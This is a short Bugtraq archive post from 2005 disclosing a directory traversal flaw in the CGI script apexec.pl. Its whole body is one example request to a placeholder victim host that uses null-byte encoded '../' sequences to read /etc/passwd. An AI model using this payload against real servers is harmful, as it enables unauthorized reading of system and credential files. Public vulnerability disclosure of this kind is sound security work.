Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Directoy Traversal Attack in apexec.pl (.%00./-Bug)

From: <msdarkflyer () linuxmail org>
Date: 19 Apr 2005 12:57:48 -0000


Example:

www.victim.com/cgi-bin/apexec.pl?template=.%00./.%00./.%00./.%00./.%00./.%00./etc/passwd%%0000.html

Greetz MSDarkflyer
--
Previous By Date Next
Previous By Thread Next

Current thread: